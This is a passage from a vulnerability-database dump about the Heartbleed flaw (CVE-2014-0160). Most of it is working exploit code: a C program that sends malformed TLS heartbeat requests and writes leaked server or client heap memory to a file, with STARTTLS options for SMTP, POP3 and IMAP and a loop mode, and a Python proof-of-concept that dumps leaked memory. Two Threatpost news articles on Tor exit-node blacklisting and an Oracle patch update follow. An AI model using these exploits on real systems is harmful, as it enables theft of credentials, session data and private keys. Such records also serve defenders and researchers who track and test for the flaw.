cannot bind socket\\n\");\n\t\texit(0);\n\t}\n\tlisten(sd,5);\n\treturn(sd);\n}\n\n\nvoid ssl_init(){\n SSL_load_error_strings();\n SSL_library_init();\n OpenSSL_add_all_digests();\n OpenSSL_add_all_algorithms();\n OpenSSL_add_all_ciphers();\n}\n\nconnection* tls_connect(int sd){\n connection *c;\n\tc = malloc(sizeof(connection));\n if(c==NULL){\n\t\tprintf(\"[ error in malloc()\\n\");\n\t\texit(0);\n\t}\n\tc->socket = sd;\n c->sslHandle = NULL;\n c->sslContext = NULL;\n c->sslContext = SSL_CTX_new(SSLv23_client_method());\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\n if(c->sslContext==NULL)\n ERR_print_errors_fp(stderr);\n c->sslHandle = SSL_new(c->sslContext);\n if(c->sslHandle==NULL)\n ERR_print_errors_fp(stderr);\n if(!SSL_set_fd(c->sslHandle,c->socket))\n ERR_print_errors_fp(stderr);\n if(SSL_connect(c->sslHandle)!=1)\n ERR_print_errors_fp(stderr);\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\n printf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\");\n }\n\treturn c;\n}\n\nconnection* tls_bind(int sd){\n\tint bytes;\n connection *c;\n char* buf;\n\tbuf = malloc(4096);\n if(buf==NULL){\n printf(\"[ error in malloc()\\n\");\n exit(0);\n }\n\tmemset(buf,0,4096);\n\tc = malloc(sizeof(connection));\n\tif(c==NULL){\n printf(\"[ error in malloc()\\n\");\n exit(0);\n }\n\tc->socket = sd;\n c->sslHandle = NULL;\n c->sslContext = NULL;\n c->sslContext = SSL_CTX_new(SSLv23_server_method());\n if(c->sslContext==NULL)\n ERR_print_errors_fp(stderr);\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\n\tSSL_CTX_SRP_CTX_init(c->sslContext);\n\tSSL_CTX_use_certificate_file(c->sslContext, \"./server.crt\", SSL_FILETYPE_PEM);\n\tSSL_CTX_use_PrivateKey_file(c->sslContext, \"./server.key\", SSL_FILETYPE_PEM); \n\tif(!SSL_CTX_check_private_key(c->sslContext)){\n\t\tprintf(\"[!] 
FATAL: private key does not match the certificate public key\\n\");\n\t\texit(0);\n\t}\n\tc->sslHandle = SSL_new(c->sslContext);\n if(c->sslHandle==NULL)\n ERR_print_errors_fp(stderr);\n if(!SSL_set_fd(c->sslHandle,c->socket))\n ERR_print_errors_fp(stderr);\n int rc = SSL_accept(c->sslHandle);\n\tprintf (\"[ SSL connection using %s\\n\", SSL_get_cipher (c->sslHandle));\n\tbytes = SSL_read(c->sslHandle, buf, 4095);\n\tprintf(\"[ recieved: %d bytes - showing output\\n%s\\n[\\n\",bytes,buf);\n\tif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\n printf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\");\n }\n return c;\n}\n\nint pre_cmd(int sd,int precmd,int verbose){\n\t/* this function can be used to send commands to a plain-text\n\tservice or client before heartbleed exploit attempt. e.g. STARTTLS */\n\tint rc, go = 0;\n\tchar* buffer;\n\tchar* line1;\n\tchar* line2; \n\tswitch(precmd){\n\t\tcase 0:\n\t\t\tline1 = \"EHLO test\\n\";\n\t\t\tline2 = \"STARTTLS\\n\";\n\t\t\tbreak;\n\t\tcase 1:\n\t\t\tline1 = \"CAPA\\n\";\n\t\t\tline2 = \"STLS\\n\";\n\t\t\tbreak;\n\t\tcase 2:\n\t\t\tline1 = \"a001 CAPB\\n\";\n\t\t\tline2 = \"a002 STARTTLS\\n\";\n\t\t\tbreak;\n\t\tdefault:\n\t\t\tgo = 1;\n\t\t\tbreak;\n\t}\n\tif(go==0){\n\t\tbuffer = malloc(2049);\n\t if(buffer==NULL){\n \tprintf(\"[ error in malloc()\\n\");\n \texit(0);\n\t }\n\t\tmemset(buffer,0,2049);\n\t\trc = read(sd,buffer,2048);\n\t\tprintf(\"[ banner: %s\",buffer);\n\t\tsend(sd,line1,strlen(line1),0);\n\t\tmemset(buffer,0,2049);\n\t\trc = read(sd,buffer,2048);\n\t\tif(verbose==1){\n\t\t\tprintf(\"%s\\n\",buffer);\n\t\t}\n\t\tsend(sd,line2,strlen(line2),0);\n\t\tmemset(buffer,0,2049);\n\t\trc = read(sd,buffer,2048);\n\t\tif(verbose==1){\n\t\t\tprintf(\"%s\\n\",buffer);\n\t\t}\n\t}\n\treturn sd;\n}\n\nvoid* heartbleed(connection *c,unsigned int type){\n\tunsigned char *buf, *p;\n int ret;\n\tbuf = OPENSSL_malloc(1 + 
2);\n\tif(buf==NULL){\n printf(\"[ error in malloc()\\n\");\n exit(0);\n }\n\tp = buf;\n *p++ = TLS1_HB_REQUEST;\n\tswitch(type){\n\t\tcase 0:\n\t\t\ts2n(0x0,p);\n\t\t\tbreak;\n\t\tcase 1:\n\t\t\ts2n(0xffff,p);\n\t\t\tbreak;\n\t\tdefault:\n\t\t\tprintf(\"[ setting heartbeat payload_length to %u\\n\",type);\n\t\t\ts2n(type,p);\n\t\t\tbreak;\n\t}\n\tprintf(\"[ <3 <3 <3 heart bleed <3 <3 <3\\n\");\n ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);\n OPENSSL_free(buf);\n\treturn c;\n}\n\nvoid* sneakyleaky(connection *c,char* filename, int verbose){\n\tchar *p;\n int ssl_major,ssl_minor,al;\n int enc_err,n,i;\n SSL3_RECORD *rr;\n SSL_SESSION *sess;\n\tSSL* s;\n unsigned char md[EVP_MAX_MD_SIZE];\n short version;\n unsigned mac_size, orig_len;\n size_t extra;\n rr= &(c->sslHandle->s3->rrec);\n sess=c->sslHandle->session;\n s = c->sslHandle;\n if (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER)\n extra=SSL3_RT_MAX_EXTRA;\n else\n extra=0;\n if ((s->rstate != SSL_ST_READ_BODY) ||\n (s->packet_length < SSL3_RT_HEADER_LENGTH)) {\n n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\n if (n <= 0)\n goto apple; \n s->rstate=SSL_ST_READ_BODY;\n p=s->packet;\n rr->type= *(p++);\n ssl_major= *(p++);\n ssl_minor= *(p++);\n version=(ssl_major<<8)|ssl_minor;\n n2s(p,rr->length);\n\t\t\tif(rr->type==24){\n\t\t\t\tprintf(\"[ heartbeat returned type=%d length=%u\\n\",rr->type, rr->length);\n\t\t\t\tif(rr->length > 16834){\n\t\t\t\t\tprintf(\"[ error: got a malformed TLS length.\\n\");\n\t\t\t\t\texit(0);\n\t\t\t\t}\n\t\t\t}\n\t\t\telse{\n\t\t\t\tprintf(\"[ incorrect record type=%d length=%u returned\\n\",rr->type,rr->length);\n\t\t\t\ts->packet_length=0;\n\t\t\t\tbadpackets++;\n\t\t\t\tif(badpackets > 3){\n\t\t\t\t\tprintf(\"[ error: too many bad packets recieved\\n\");\n\t\t\t\t\texit(0);\n\t\t\t\t}\n\t\t\t\tgoto apple;\n\t\t\t}\n }\n if (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){\n i=rr->length;\n n=ssl3_read_n(s,i,i,1);\n if (n <= 0) 
goto apple; \n }\n\tprintf(\"[ decrypting SSL packet\\n\");\n s->rstate=SSL_ST_READ_HEADER; \n rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);\n rr->data=rr->input;\n tls1_enc(s,0);\n if((sess != NULL) &&\n (s->enc_read_ctx != NULL) &&\n (EVP_MD_CTX_md(s->read_hash) != NULL))\n {\n unsigned char *mac = NULL;\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\n mac_size=EVP_MD_CTX_size(s->read_hash);\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\n orig_len = rr->length+((unsigned int)rr->type>>8);\n if(orig_len < mac_size ||\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\n orig_len < mac_size+1)){\n al=SSL_AD_DECODE_ERROR;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\n }\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\n mac = mac_tmp;\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\n rr->length -= mac_size;\n }\n else{\n rr->length -= mac_size;\n mac = &rr->data[rr->length];\n }\n i = tls1_mac(s,md,0);\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\n enc_err = -1;\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size)\n enc_err = -1;\n }\n if(enc_err < 0){\n al=SSL_AD_BAD_RECORD_MAC;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\n goto apple;\n }\n if(s->expand != NULL){\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) {\n al=SSL_AD_RECORD_OVERFLOW;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\n goto apple;\n }\n if (!ssl3_do_uncompress(s)) {\n al=SSL_AD_DECOMPRESSION_FAILURE;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\n goto apple;\n }\n }\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) {\n al=SSL_AD_RECORD_OVERFLOW;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\n goto apple;\n }\n rr->off=0;\n s->packet_length=0;\n\tif(first==0){\n\t\tuint heartbleed_len = 0;\n\t\tchar* fp = s->s3->rrec.data;\n\t\t(long)fp++;\n\t\tmemcpy(&heartbleed_len,fp,2);\n\t\theartbleed_len = (heartbleed_len & 0xff) << 8 | 
(heartbleed_len & 0xff00) >> 8;\n\t\tfirst = 2;\n\t\tleakbytes = heartbleed_len + 16;\n\t\tprintf(\"[ heartbleed leaked length=%u\\n\",heartbleed_len);\n\t}\n\tif(verbose==1){\n\t\t{ unsigned int z; for (z=0; z<rr->length; z++) printf(\"%02X%c\",rr->data[z],((z+1)%16)?' ':'\\n'); }\n printf(\"\\n\");\n }\n\tleakbytes-=rr->length;\n\tif(leakbytes > 0){\n\t\trepeat = 1;\n\t}\n\telse{\n\t\trepeat = 0;\n\t}\n\tprintf(\"[ final record type=%d, length=%u\\n\", rr->type, rr->length);\n\tint output = s->s3->rrec.length-3;\n\tif(output > 0){\n\t\tint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\n\t if(first==2){\n\t\t\tfirst--;\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\n\t\t\t/* first three bytes are resp+len */\n\t\t\tprintf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length-3,filename);\n\t\t}\n\t\telse{\n\t\t\t/* heap data & 16 bytes padding */\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\n\t\t\tprintf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length,filename);\n\t\t}\n\t\tclose(fd);\n\t}\n\telse{\n\t\tprintf(\"[ nothing from the heap to write\\n\");\n\t}\n\treturn;\napple:\n printf(\"[ problem handling SSL record packet - wrong type?\\n\");\n\tbadpackets++;\n\tif(badpackets > 3){\n\t\tprintf(\"[ error: too many bad packets recieved\\n\");\n\t\texit(0);\n\t}\n\treturn;\n}\n\nvoid usage(){\n\tprintf(\"[\\n\");\n\tprintf(\"[ --server|-s <ip/dns> - the server to target\\n\");\n\tprintf(\"[ --port|-p <port> - the port to target\\n\");\n\tprintf(\"[ --file|-f <filename> - file to write data to\\n\");\n\tprintf(\"[ --bind|-b <ip> - bind to ip for exploiting clients\\n\");\n\tprintf(\"[ --precmd|-c <n> - send precmd buffer (STARTTLS)\\n\");\n\tprintf(\"[\t\t\t 0 = SMTP\\n\");\n\tprintf(\"[\t\t\t 1 = POP3\\n\");\n\tprintf(\"[\t\t\t 2 = IMAP\\n\");\n\tprintf(\"[ --loop|-l\t\t - loop the exploit attempts\\n\");\n\tprintf(\"[ --type|-t <n> - select exploit to try\\n\");\n\tprintf(\"[ 0 = null 
length\\n\");\n\tprintf(\"[\t\t\t 1 = max leak\\n\");\n\tprintf(\"[\t\t\t n = heartbeat payload_length\\n\");\n\tprintf(\"[\\n\");\n\tprintf(\"[ --verbose|-v - output leak to screen\\n\");\n\tprintf(\"[ --help|-h - this output\\n\");\n\tprintf(\"[\\n\");\n\texit(0);\n}\n\nint main(int argc, char* argv[]){\n\tint ret, port, userc, index;\n\tint type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9;\n\tint loop = 0;\n\tstruct hostent *h;\n\tconnection* c;\n\tchar *host, *file;\n\tint ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;\n\tprintf(\"[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\n\");\n\tprintf(\"[ =============================================================\\n\");\n static struct option options[] = {\n \t{\"server\", 1, 0, 's'},\n\t {\"port\", 1, 0, 'p'},\n\t\t{\"file\", 1, 0, 'f'},\n\t\t{\"type\", 1, 0, 't'},\n\t\t{\"bind\", 1, 0, 'b'},\n\t\t{\"verbose\", 0, 0, 'v'},\n\t\t{\"precmd\", 1, 0, 'c'},\n\t\t{\"loop\", 0, 0, 'l'},\n\t\t{\"help\", 0, 0,'h'}\n };\n\twhile(userc != -1) {\n\t userc = getopt_long(argc,argv,\"s:p:f:t:b:c:lvh\",options,&index);\t\n \tswitch(userc) {\n \t\tcase -1:\n\t break;\n \t case 's':\n\t\t\t\tif(ihost==0){\n\t\t\t\t\tihost = 1;\n\t\t\t\t\th = gethostbyname(optarg);\t\t\t\t\n\t\t\t\t\tif(h==NULL){\n\t\t\t\t\t\tprintf(\"[!] 
FATAL: unknown host '%s'\\n\",optarg);\n\t\t\t\t\t\texit(1);\n\t\t\t\t\t}\n\t\t\t\t\thost = malloc(strlen(optarg) + 1);\n\t\t\t\t\tif(host==NULL){\n \t\t\t\tprintf(\"[ error in malloc()\\n\");\n\t\t\t\t exit(0);\n \t\t\t\t}\n\t\t\t\t\tsprintf(host,\"%s\",optarg);\n \t\t\t}\n\t\t\t\tbreak;\n\t case 'p':\n\t\t\t\tif(iport==0){\n\t\t\t\t\tport = atoi(optarg);\n\t\t\t\t\tiport = 1;\n\t\t\t\t}\n \t break;\n\t\t\tcase 'f':\n\t\t\t\tif(ifile==0){\n\t\t\t\t\tfile = malloc(strlen(optarg) + 1);\n\t\t\t\t\tif(file==NULL){\n\t\t\t\t printf(\"[ error in malloc()\\n\");\n \t\t\t\texit(0);\n \t\t\t\t}\n\t\t\t\t\tsprintf(file,\"%s\",optarg);\n\t\t\t\t\tifile = 1;\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase 't':\n\t\t\t\tif(itype==0){\n\t\t\t\t\ttype = atoi(optarg);\n\t\t\t\t\titype = 1;\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase 'h':\n\t\t\t\tusage();\n\t\t\t\tbreak;\n\t\t\tcase 'b':\n\t\t\t\tif(ihost==0){\n\t\t\t\t\tihost = 1;\n\t\t\t\t\thost = malloc(strlen(optarg)+1);\n\t\t\t\t\tif(host==NULL){\n\t\t\t \t printf(\"[ error in malloc()\\n\");\n\t\t\t\t exit(0);\n\t\t\t\t }\n\t\t\t\t\tsprintf(host,\"%s\",optarg);\n\t\t\t\t\tbind = 1;\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase 'c':\n\t\t\t\tif(iprecmd == 0){\n\t\t\t\t\tiprecmd = 1;\n\t\t\t\t\tprecmd = atoi(optarg);\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase 'v':\n\t\t\t\tverbose = 1;\n\t\t\t\tbreak;\n\t\t\tcase 'l':\n\t\t\t\tloop = 1;\n\t\t\t\tbreak;\n\t\t\tdefault:\n\t\t\t\tbreak;\n\t\t}\n\t}\n\tif(ihost==0||iport==0||ifile==0||itype==0||type < 0){\n\t\tprintf(\"[ try --help\\n\");\n\t\texit(0);\n\t}\n\tssl_init();\n\tif(bind==0){\n\t\tret = tcp_connect(host, port);\n\t\tpre_cmd(ret, precmd, verbose);\n\t\tc = tls_connect(ret);\n\t\theartbleed(c,type);\n\t\twhile(repeat==1){\n\t\t\tsneakyleaky(c,file,verbose);\n\t\t}\n\t\twhile(loop==1){\n\t\t\tprintf(\"[ entered heartbleed loop\\n\");\n\t\t\tfirst=0;\n\t\t\trepeat=1;\n\t\t\theartbleed(c,type);\n\t\t\twhile(repeat==1){\n\t\t\t\tsneakyleaky(c,file,verbose);\n\t\t\t}\n\t\t}\n\t\tprintf(\"[ 
done.\\n\");\n\t\texit(0);\n\t}\n\telse{\n\t\tint sd, pid, i;\n\t\tret = tcp_bind(host, port);\n\t\twhile(1){\n \t\t\tsd=accept(ret,0,0);\n\t\t\tif(sd==-1){\n\t\t\t\tprintf(\"[!] FATAL: problem with accept()\\n\");\n\t\t\t\texit(0);\n\t\t\t}\n\t\t\tif(pid=fork()){\n\t\t\t\tclose(sd);\n\t\t\t}\n \t\t\telse{\n\t\t\t\tc = tls_bind(sd);\n\t\t\t\tpre_cmd(ret, precmd, verbose);\n\t\t\t\theartbleed(c,type);\n\t\t\t\twhile(repeat==1){\n\t\t\t\t\tsneakyleaky(c,file,verbose);\n\t\t\t\t}\n\t\t\t\twhile(loop==1){\n\t\t\t\t\tprintf(\"[ entered heartbleed loop\\n\");\n\t\t\t\t\tfirst=0;\n\t\t\t\t\trepeat=0;\n\t\t\t\t\theartbleed(c,type);\n\t\t\t\t\twhile(repeat==1){\n\t\t\t\t\t\tsneakyleaky(c,file,verbose);\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tprintf(\"[ done.\\n\");\n\t\t\t\texit(0);\n\t\t\t}\n\t\t}\n\t}\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-01T19:04:39", "description": "\nOpenSSL 1.0.1f TLS Heartbeat Extension - Heartbleed Memory Disclosure (Multiple SSLTLS Versions)", "edition": 1, "published": "2014-04-09T00:00:00", "title": "OpenSSL 1.0.1f TLS Heartbeat Extension - Heartbleed Memory Disclosure (Multiple SSLTLS Versions)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "id": "EXPLOITPACK:BBA53240047E43646B744C9628FA5EFD", "href": "", "sourceData": "# Exploit Title: [OpenSSL TLS Heartbeat Extension - Memory Disclosure - Multiple SSL/TLS versions]\n# Date: [2014-04-09]\n# Exploit Author: [Csaba Fitzl]\n# Vendor Homepage: [http://www.openssl.org/]\n# Software Link: [http://www.openssl.org/source/openssl-1.0.1f.tar.gz]\n# Version: [1.0.1f]\n# Tested on: [N/A]\n# CVE : [2014-0160]\n\n\n#!/usr/bin/env python\n\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)\n# The author disclaims copyright to this source code.\n# Modified by Csaba Fitzl for multiple SSL / TLS version support\n\nimport sys\nimport struct\nimport 
socket\nimport time\nimport select\nimport re\nfrom optparse import OptionParser\n\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\n\ndef h2bin(x):\n\treturn x.replace(' ', '').replace('\\n', '').decode('hex')\n\nversion = []\nversion.append(['SSL 3.0','03 00'])\nversion.append(['TLS 1.0','03 01'])\nversion.append(['TLS 1.1','03 02'])\nversion.append(['TLS 1.2','03 03'])\n\ndef create_hello(version):\n\thello = h2bin('16 ' + version + ' 00 dc 01 00 00 d8 ' + version + ''' 53\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\n00 0f 00 01 01\n''')\n\treturn hello\n\ndef create_hb(version):\n\thb = h2bin('18 ' + version + ' 00 03 01 40 00')\n\treturn hb\n\ndef hexdump(s):\n\tfor b in xrange(0, len(s), 16):\n\t\tlin = [c for c in s[b : b + 16]]\n\t\thxdat = ' '.join('%02X' % ord(c) for c in lin)\n\t\tpdat = ''.join((c if 32 <= ord(c) <= 126 else '.' 
)for c in lin)\n\t\tprint ' %04x: %-48s %s' % (b, hxdat, pdat)\n\tprint\n\ndef recvall(s, length, timeout=5):\n\tendtime = time.time() + timeout\n\trdata = ''\n\tremain = length\n\twhile remain > 0:\n\t\trtime = endtime - time.time()\n\t\tif rtime < 0:\n\t\t\treturn None\n\t\tr, w, e = select.select([s], [], [], 5)\n\t\tif s in r:\n\t\t\tdata = s.recv(remain)\n\t\t\t# EOF?\n\t\t\tif not data:\n\t\t\t\treturn None\n\t\t\trdata += data\n\t\t\tremain -= len(data)\n\treturn rdata\n\n\ndef recvmsg(s):\n\thdr = recvall(s, 5)\n\tif hdr is None:\n\t\tprint 'Unexpected EOF receiving record header - server closed connection'\n\t\treturn None, None, None\n\ttyp, ver, ln = struct.unpack('>BHH', hdr)\n\tpay = recvall(s, ln, 10)\n\tif pay is None:\n\t\tprint 'Unexpected EOF receiving record payload - server closed connection'\n\t\treturn None, None, None\n\tprint ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\n\treturn typ, ver, pay\n\ndef hit_hb(s,hb):\n\ts.send(hb)\n\twhile True:\n\t\ttyp, ver, pay = recvmsg(s)\n\t\tif typ is None:\n\t\t\tprint 'No heartbeat response received, server likely not vulnerable'\n\t\t\treturn False\n\n\t\tif typ == 24:\n\t\t\tprint 'Received heartbeat response:'\n\t\t\thexdump(pay)\n\t\t\tif len(pay) > 3:\n\t\t\t\tprint 'WARNING: server returned more data than it should - server is vulnerable!'\n\t\t\telse:\n\t\t\t\tprint 'Server processed malformed heartbeat, but did not return any extra data.'\n\t\t\treturn True\n\n\t\tif typ == 21:\n\t\t\tprint 'Received alert:'\n\t\t\thexdump(pay)\n\t\t\tprint 'Server returned error, likely not vulnerable'\n\t\t\treturn False\n\ndef main():\n\topts, args = options.parse_args()\n\tif len(args) < 1:\n\t\toptions.print_help()\n\t\treturn\n\tfor i in range(len(version)):\n\t\tprint 'Trying ' + version[i][0] + '...'\n\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\tprint 'Connecting...'\n\t\tsys.stdout.flush()\n\t\ts.connect((args[0], opts.port))\n\t\tprint 'Sending 
Client Hello...'\n\t\tsys.stdout.flush()\n\t\ts.send(create_hello(version[i][1]))\n\t\tprint 'Waiting for Server Hello...'\n\t\tsys.stdout.flush()\n\t\twhile True:\n\t\t\ttyp, ver, pay = recvmsg(s)\n\t\t\tif typ == None:\n\t\t\t\tprint 'Server closed connection without sending Server Hello.'\n\t\t\t\treturn\n\t\t\t# Look for server hello done message.\n\t\t\tif typ == 22 and ord(pay[0]) == 0x0E:\n\t\t\t\tbreak\n\n\t\tprint 'Sending heartbeat request...'\n\t\tsys.stdout.flush()\n\t\ts.send(create_hb(version[i][1]))\n\t\tif hit_hb(s,create_hb(version[i][1])):\n\t\t\t#Stop if vulnerable\n\t\t\tbreak\n\nif __name__ == '__main__':\n\tmain()", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "threatpost": [{"lastseen": "2018-10-06T22:58:59", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "The Tor Project has begun blacklisting exit nodes vulnerable to the [Heartbleed vulnerability in OpenSSL](<https://threatpost.com/certificate-revocation-slow-for-heartbleed-servers/105489>).\n\nResearcher Collin Mulliner, with the Systems Security Lab at Northeastern University in Boston, published the results of an experiment he conducted using a publicly disclosed Heartbleed proof-of-concept exploit against 5,000 Tor nodes. Mulliner said that [1,045 nodes, or a little more than 20 percent, were vulnerable to the bug](<http://www.mulliner.org/blog/blosxom.cgi/security/torbleed.html>).\n\nMulliner said only Tor exit nodes were leaking plaintext user traffic, including host names, credentials and web content. Mulliner conducted his experiment for three days last Friday through Sunday, and his results are a point-in-time snapshot. A post yesterday from Tor Project leader Roger Dingledine on the Tor mailing list said that [380 vulnerable exit keys were being rejected](<https://lists.torproject.org/pipermail/tor-relays/2014-April/004336.html>).\n\nHeartbleed was publicly reported on April 7. 
The vulnerability lies in the heartbeat function in OpenSSL 1.0.1 to 1.0.1f [which publicly leaks 64 KB of memory](<https://threatpost.com/seriousness-of-openssl-heartbleed-bug-sets-in/105309>) to any client or server pinging a web server running the vulnerable crypto library. The memory leaks can disclose in plaintext anything from user credentials to private server keys if the attack is repeated enough. Several researchers have already managed to [retrieve private SSL keys](<http://threatpost.com/stealing-private-ssl-keys-using-heartbleed-difficult-not-impossible/105413>) in an online challenge from vendor CloudFlare. Speculation is that intelligence agencies and/or hackers may have been exploiting it since November. Mulliner said he did not try to extract private keys from Tor, nor did he think it was possible.\n\nTor promises anonymity to its users by using proxies to pass encrypted traffic from source to destination. Mulliner said he used a random list of 5,000 Tor nodes from the Dan.me.uk website for his research; of the 1,045 vulnerable nodes he discovered, he recovered plaintext traffic that included Tor plaintext announcements, but a significant number of nodes leaked user traffic in the clear.\n\n\u201cI found a significant amount of plaintext user traffic, complete Web traffic, session IDs; everything you would find if you ran Heartbleed against a normal Web server,\u201d Mulliner said.\n\nHeartbleed saves attackers the work of setting up their own exit node and waiting for traffic to pass through it. Using Heartbleed, all a hacker would have to do is query a vulnerable exit node to obtain traffic, Mulliner said.\n\nDingledine yesterday published the first list of rejected exit nodes and said those nodes will not be allowed back on the network.\n\n\u201cI thought for a while about trying to keep my list of fingerprints up-to-date (i.e. 
removing the !reject line once they\u2019ve upgraded their openssl), but on the other hand, if they were still vulnerable as of yesterday, I really don\u2019t want this identity key on the Tor network even after they\u2019ve upgraded their OpenSSL,\u201d Dingledine wrote. He added that he hopes others will add to this list as other vulnerable relays are discovered.\n\nTor acknowledged [some of its components were vulnerable to Heartbleed](<https://blog.torproject.org/blog/openssl-bug-cve-2014-0160>) in a post to its blog on April 7.\n\nMulliner said it was a fairly straightforward process to write a script to run a Heartbleed proof of concept.\n\n\u201cAnybody who can get the Python script can play around with it,\u201d Mulliner said, adding that there are likely fewer vulnerable Tor nodes now than when he ran his scans last week since some have likely been patched and Tor has begun blacklisting. \u201cThe data is dated, but it\u2019s a good picture of that point in time.\u201d\n", "modified": "2014-04-22T15:45:23", "published": "2014-04-17T11:40:41", "id": "THREATPOST:15624C23F5CD5AC1029501D08A99D294", "href": "https://threatpost.com/tor-begins-blacklisting-exit-nodes-vulnerable-to-heartbleed/105519/", "type": "threatpost", "title": "Tor Blacklisting Exit Nodes Vulnerable to Heartbleed Bug", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-10-06T22:59:00", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "Software maker and database management company Oracle yesterday released its quarterly [Critical Patch Update](<http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html>). 
The release resolves more than 100 security vulnerabilities, many of which received high Common Vulnerability Scoring System (CVSS) base scores; the fixes should be applied as soon as possible.\n\nProducts affected by the patch include but are not limited to Oracle Database, Fusion Middleware, Hyperion, Supply Chain Product Suite, iLearning, PeopleSoft Enterprise, Siebel CRM, Java SE, and Sun Microsystems Products Suite, including Oracle Linux and Virtualization, and Oracle MySQL.\n\nLast week, Oracle released a [list of products](<http://www.oracle.com/technetwork/topics/security/opensslheartbleedcve-2014-0160-2188454.html>) affected by the [Heartbleed OpenSSL vulnerability](<http://threatpost.com/certificate-revocation-slow-for-heartbleed-servers/105489>), as well as their current status with respect to vulnerable versions of the encryption library.\n\nAmong the patches that should be prioritized are fixes for two bugs in Oracle\u2019s database products. The more severe of these two issues could lead to a full compromise of impacted Windows systems, though exploitation would require that an attacker authenticate himself or herself. Other platforms like Linux and Solaris are less affected because the database does not extend into the underlying operating system there.\n\nThe update also closes off 20 Fusion middleware vulnerabilities, the most critical of which is remotely exploitable without authentication and could lead to a wide compromise of the WebLogic Server.\n\nAlso included in its April release are 37 Java vulnerabilities. Four of those received the highest possible CVSS ratings of 10.0. Oracle urges all users \u2013 home users in particular \u2013 to apply these patches immediately.\n\nThe patch update also fixes five vulnerabilities affecting Oracle Linux and Virtualization products. 
